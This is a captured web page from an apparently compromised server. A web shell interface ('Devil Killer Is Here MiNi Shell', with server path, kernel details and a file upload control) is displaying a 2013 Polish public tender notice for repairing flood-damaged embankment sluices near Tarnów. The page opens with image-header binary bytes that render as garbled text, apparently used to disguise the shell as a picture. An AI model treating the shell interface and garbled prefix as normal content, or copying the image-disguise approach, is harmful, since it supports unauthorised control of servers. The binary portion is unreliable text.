JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130909/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130909/364538-N-2013.html

<p class="kh_header"><b>Tarnów: Zaprojektowanie i wykonanie robót budowlanych dla zadań pn:
Część 1 zamówienia
Usuwanie szkód powodziowych na prawym wale potoku Gróbka - śluza wałowa w km 20+410 w msc. Gawłów, gm. Bochnia, pow. bocheński.
Część 2 zamówienia
Usuwanie szkód powodziowych na prawym wale rzeki Wisły - śluza wałowa nr 5 w km 17+120 w msc. Dąbrówka Morska, gm. Szczurowa, pow. brzeski.</b><br>
<b>Numer ogłoszenia: 364538 - 2013; data zamieszczenia: 09.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolski Zarząd Melioracji i Urządzeń Wodnych w Krakowie Inspektorat Rejonowy w Tarnowie , ul. Ostrogskich 5, 33-100 Tarnów, woj. małopolskie, tel. 014 6376922, faks 014 6376913.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.mzmiuw.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaprojektowanie i wykonanie robót budowlanych dla zadań pn:
Część 1 zamówienia
Usuwanie szkód powodziowych na prawym wale potoku Gróbka - śluza wałowa w km 20+410 w msc. Gawłów, gm. Bochnia, pow. bocheński.
Część 2 zamówienia
Usuwanie szkód powodziowych na prawym wale rzeki Wisły - śluza wałowa nr 5 w km 17+120 w msc. Dąbrówka Morska, gm. Szczurowa, pow. brzeski..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA.
Część 1 zamówienia
Przedmiotem zamówienia jest zaprojektowanie i wykonanie robót budowlanych dla zadania pn:
Usuwanie szkód powodziowych na prawym wale potoku Gróbka - śluza wałowa w km 20+410 w msc. Gawłów, gm. Bochnia, pow. bocheński.

Zakres planowanych prac winien uwzględniać:
1.Wykonanie wału okrężnego zabezpieczającego przyległy teren 
przed wysokimi poziomami wód w rzece lub zamiennie tymczasowej ścianki szczelnej stalowej.
2.Rozebranie wału na odcinku niezbędnym do realizacji robót i na odpowiednią głębokość. 
3.Rozebranie rurociągu o średnicy 600 mm z rur żelbetowych na całej długości 22 mb
4.Dogęszczenie i stabilizacja podłoża pod rurociągiem.
5.Wykonanie przesłony przeciwfiltracyjnej w stopie wału od strony odwodnej 
6.Ułożenie na podbudowie betonowej rurociągu z rury PEHD 60 ,  wykonanie betonowego pancerza na rurociągu, wykonanie żelbetowych  przyczółków (wlotowego i wylotowego)
7.Odbudowa rozebranego wału przeciwpowodziowego
8.Uszczelnienie korpusu wału ekranem uszczelniającym ( bentomatą lub geomembraną PVC zgrzewaną) na całej powierzchni wykonanych robót na skarpie odwodnej z zakotwieniem min.1,0 m poniżej przesłony pionowej, z przykryciem min 1,0 m z zachowaniem nachylenia uszczelnienia 1:1,5 , założenie biowłókniny z przybiciem na skarpie odwodnej wraz z humusowaniem i obsianiem mieszanką traw
9.Rozebranie wału okrężnego

Wykonawca podejmujący się realizacji przedmiotu zamówienia zobowiązany będzie do:
a)uzyskania zgód właścicieli  działek  na wykonanie projektowanych robót remontowych,
b)opracowania dokumentacji wymaganej do zgłoszenia robót budowlanych, dla których nie jest wymagane uzyskanie pozwolenia na budowę wraz ze złożeniem wniosku -zgłoszenie robót budowlanych, 
c)opracowania dokumentacji projektowej służącej do opisu przedmiotu zamówienia na wykonanie robót budowlanych,
d)uzyskania wymaganych uzgodnień, decyzji i opinii wymaganych odrębnymi przepisami 
e)opracowania, w uzgodnieniu z inwestorem specyfikacji technicznych wykonania 
i odbioru robót 
f)sporządzenia przedmiaru robót,
g)sporządzenia informacji dotyczącej bezpieczeństwa i ochrony zdrowia, w przypadku gdy jej opracowanie jest wymagane na podstawie odrębnych przepisów.
h)sporządzenia inwentaryzacji fotograficznej stanu istniejącego potoku,
i)przekazania kopii dokumentacji w formie elektronicznej,
j)realizacji robót w oparciu o uzgodnioną i przyjętą przez Zamawiającego dokumentację projektową,
k)prowadzenia dziennika budowy i księgi obmiarów,
l)przygotowania rozliczenia końcowego robót i sporządzenia przy współpracy z inspektorem nadzoru operatu powykonawczego,
m)sprawowania nadzoru autorskiego nad realizowanymi robotami,
n)przekazania zrealizowanego zadania administratorowi obwałowania,
o)sporządzenia inwentaryzacji geodezyjnej powykonawczej oraz inwentaryzacji fotograficznej.
Szczegółowy opis przedmiotu zamówienia zawiera Program Funkcjonalno-Użytkowy opracowany przez inż. Bogdan Muskała stanowiący załącznik do SIWZ.

Część 2 zamówienia
Przedmiotem zamówienia jest zaprojektowanie i wykonanie robót budowlanych dla zadania pn:
Usuwanie szkód powodziowych na prawym wale rzeki Wisły - śluza wałowa nr 5 w km 17+120 w msc. Dąbrówka Morska, gm. Szczurowa, pow. brzeski.
Zakres planowanych prac winien uwzględniać:
1.Wykonanie wału okrężnego zabezpieczającego przyległy teren 
przed wysokimi poziomami wód w rzece lub zamiennie tymczasowej ścianki szczelnej stalowej.
2.Rozebranie wału na odcinku niezbędnym do realizacji robót i na odpowiednią głębokość. 
3.Rozebranie rurociągu o średnicy 800 mm z rur żelbetowych na długości  stwierdzonego  uszkodzenia.
4.Dogęszczenie i stabilizacja podłoża pod rurociągiem.
5.Wykonanie przesłony przeciwfiltracyjnej w stopie wału od strony odwodnej 
6.Wymiana uszkodzonego rurociągu na długości stwierdzonego uszkodzenia, uszczelnienie rurociągu poprzez wykonanie betonowego pancerza, wykonanie  betonowego przyczółka wylotowego
7.Odbudowa rozebranego wału przeciwpowodziowego
8.Uszczelnienie korpusu wału ekranem uszczelniającym ( bentomatą lub geomembraną PVC zgrzewaną) na całej powierzchni wykonanych robót na skarpie odwodnej z zakotwieniem min.1,0 m poniżej przesłony pionowej, z przykryciem min 1,0 m z zachowaniem nachylenia uszczelnienia 1:1,5 wraz z zabezpieczeniem skarpy przed bobrami, założenie biowłókniny z przybiciem na skarpie odwodnej 
wraz z humusowaniem i obsianiem mieszanką traw
9.Rozebranie wału okrężnego

Wykonawca podejmujący się realizacji przedmiotu zamówienia zobowiązany będzie do:
a)uzyskania zgód właścicieli  działek  na wykonanie projektowanych robót remontowych,
b)opracowania dokumentacji wymaganej do zgłoszenia robót budowlanych, dla których nie jest wymagane uzyskanie pozwolenia na budowę wraz ze złożeniem wniosku -zgłoszenie robót budowlanych, 
c)opracowania dokumentacji projektowej służącej do opisu przedmiotu zamówienia na wykonanie robót budowlanych,
d)uzyskania wymaganych uzgodnień, decyzji i opinii wymaganych odrębnymi przepisami 
e)opracowania, w uzgodnieniu z inwestorem specyfikacji technicznych wykonania 
i odbioru robót 
f)sporządzenia przedmiaru robót,
g)sporządzenia informacji dotyczącej bezpieczeństwa i ochrony zdrowia, w przypadku gdy jej opracowanie jest wymagane na podstawie odrębnych przepisów.
h)sporządzenia inwentaryzacji fotograficznej stanu istniejącego potoku,
i)przekazania kopii dokumentacji w formie elektronicznej,
j)realizacji robót w oparciu o uzgodnioną i przyjętą przez Zamawiającego dokumentację projektową,
k)prowadzenia dziennika budowy i księgi obmiarów,
l)przygotowania rozliczenia końcowego robót i sporządzenia przy współpracy z inspektorem nadzoru operatu powykonawczego,
m)sprawowania nadzoru autorskiego nad realizowanymi robotami,
n)przekazania zrealizowanego zadania administratorowi obwałowania,
o)sporządzenia inwentaryzacji geodezyjnej powykonawczej oraz inwentaryzacji fotograficznej.
Szczegółowy opis przedmiotu zamówienia zawiera Program Funkcjonalno-Użytkowy opracowany przez inż. Bogdan Muskała stanowiący załącznik do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 71.32.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Dla części 1 zamówienia:
Wadium w wysokości 5 000,00  zł należy wnieść przed upływem terminu składania ofert. 
Dla części 2 zamówienia:
Wadium w wysokości 6 000,00  zł należy wnieść przed upływem terminu składania ofert. 

Wadium winno być wniesione w:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z   tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( tj. Dz. U. Nr 42, poz. 275 z 2007 r. z późn. zmianami)
Wadium wnoszone w pieniądzu należy przelać na rachunek bankowy zamawiającego: KREDYT BANK PBI S.A. II O /  KRAKÓW nr konta 70 1500 1487 1214 8003 1851 0000.
Wadium w innej formie niż pieniądz należy złożyć w formie oryginału w siedzibie Zamawiającego w Tarnowie ul. Ostrogskich 5 sekretariat ( I piętro ).
Dowód wpłaty wadium należy dołączyć do oferty. 
Wadium wnoszone w formie gwarancji lub poręczeń musi spełniać następujące wymogi:
- być wystawione na Małopolski Zarząd Melioracji i Urządzeń Wodnych w Krakowie 
-zawierać w swej treści oświadczenie gwaranta (poręczyciela), w którym zobowiązuje się on do bezwarunkowej wypłaty kwoty wadium na pierwsze żądanie Zamawiającego zawierające oświadczenie, że zaszła jedna z przesłanek wymienionych w art. 46 ust 4a i/lub  5 Ustawy.
- okres ważności wadium nie może być krótszy niż okres związania ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części 1 zamówienia: Zamawiający dokona oceny spełnienia warunków zgodnie z formułą spełnienia / nie spełnienia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji. Warunek ten zostanie spełniony jeżeli wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał 1 robotę budowlaną wraz z dokumentacją projektową (potwierdzoną dowodami określającymi, że robota ta została wykonana w sposób należyty oraz wskazującymi, że została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona) wartość tej roboty nie mniejsza niż 150 000,00 zł (słownie: sto pięćdziesiąt tysięcy złotych) w zakresie budowy, odbudowy lub remontu śluz wałowych. 
Dla części 2 zamówienia: Zamawiający dokona oceny spełnienia warunków zgodnie z formułą spełnienia / nie spełnienia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.Warunek ten zostanie spełniony jeżeli wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał 1 robotę budowlaną wraz z dokumentacją projektową (potwierdzoną dowodami określającymi, że robota ta została wykonana w sposób należyty oraz wskazującymi, że została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona) wartość tej roboty nie mniejsza niż 150 000,00 zł (słownie: sto pięćdziesiąt tysięcy złotych) w zakresie budowy, odbudowy lub remontu śluz wałowych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części 1 zamówienia: Zamawiający dokona oceny spełnienia warunków zgodnie z formułą spełnienia / nie spełnienia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji. Warunek ten zostanie spełniony jeżeli wykonawca wykaże, że dysponuje w szczególności: koparka 1 szt., specjalistyczny sprzęt do wykonania ścianki szczelnej stalowej 1 kpl., walec 1 szt.
Dla części 2 zamówienia: Zamawiający dokona oceny spełnienia warunków zgodnie z formułą spełnienia / nie spełnienia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.Warunek ten zostanie spełniony jeżeli wykonawca wykaże, że dysponuje w szczególności: koparka 1 szt., specjalistyczny sprzęt do wykonania ścianki szczelnej stalowej 1 kpl., walec 1 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części 1 zamówienia: Zamawiający dokona oceny spełnienia warunków zgodnie z formułą spełnienia / nie spełnienia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji. Warunek ten zostanie spełniony jeżeli wykonawca wykaże, że dysponują osobami posiadającymi kwalifikacje konieczne do realizacji zamówienia w rozumieniu ustawy Prawo budowlane z dnia 7 lipca 1994 ( tj. Dz. U. z 2006 r., Nr 156, poz. 1118 z późn. zm.), to jest:
- kierownik budowy posiada uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno-budowlanej w specjalizacji budowle hydrotechniczne lub specjalności konstrukcyjno-budowlanej w specjalizacji obiekty budowlane melioracji lub odpowiadające im równoważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów oraz jest członkiem  Okręgowej Izby Inżynierów Budownictwa
- projektant posiada uprawnienia budowlane do projektowania w specjalności konstrukcyjno-budowlanej w specjalizacji budowle hydrotechniczne lub specjalności konstrukcyjno-budowlanej w specjalizacji obiekty budowlane melioracji lub odpowiadające im równoważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów oraz jest członkiem  Okręgowej Izby Inżynierów Budownictwa
Dla części 2 zamówienia: Zamawiający dokona oceny spełnienia warunków zgodnie z formułą spełnienia / nie spełnienia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.   Warunek ten zostanie spełniony jeżeli wykonawca wykaże, że dysponują osobami posiadającymi kwalifikacje konieczne do realizacji zamówienia w rozumieniu ustawy Prawo budowlane z dnia 7 lipca 1994 ( tj. Dz. U. z 2006 r., Nr 156, poz. 1118 z późn. zm.), to jest:
- kierownik budowy posiada uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno-budowlanej w specjalizacji budowle hydrotechniczne lub specjalności konstrukcyjno-budowlanej w specjalizacji obiekty budowlane melioracji lub odpowiadające im równoważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów oraz jest członkiem  Okręgowej Izby Inżynierów Budownictwa
- projektant posiada uprawnienia budowlane do projektowania w specjalności konstrukcyjno-budowlanej w specjalizacji budowle hydrotechniczne lub specjalności konstrukcyjno-budowlanej w specjalizacji obiekty budowlane melioracji lub odpowiadające im równoważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów oraz jest członkiem  Okręgowej Izby Inżynierów Budownictwa</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części 1 zamówienia: Zamawiający dokona oceny spełnienia warunków zgodnie z formułą spełnienia / nie spełnienia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji. Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem niniejszego zamówienia na wartość co najmniej 200 000,00 PLN (słownie: dwieście tysięcy złotych 00/100).
Dla części 2 zamówienia: Zamawiający dokona oceny spełnienia warunków zgodnie z formułą spełnienia / nie spełnienia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji. Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem niniejszego zamówienia na wartość co najmniej 250 000,00 PLN (słownie: dwieście pięćdziesiąt tysięcy złotych 00/100).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
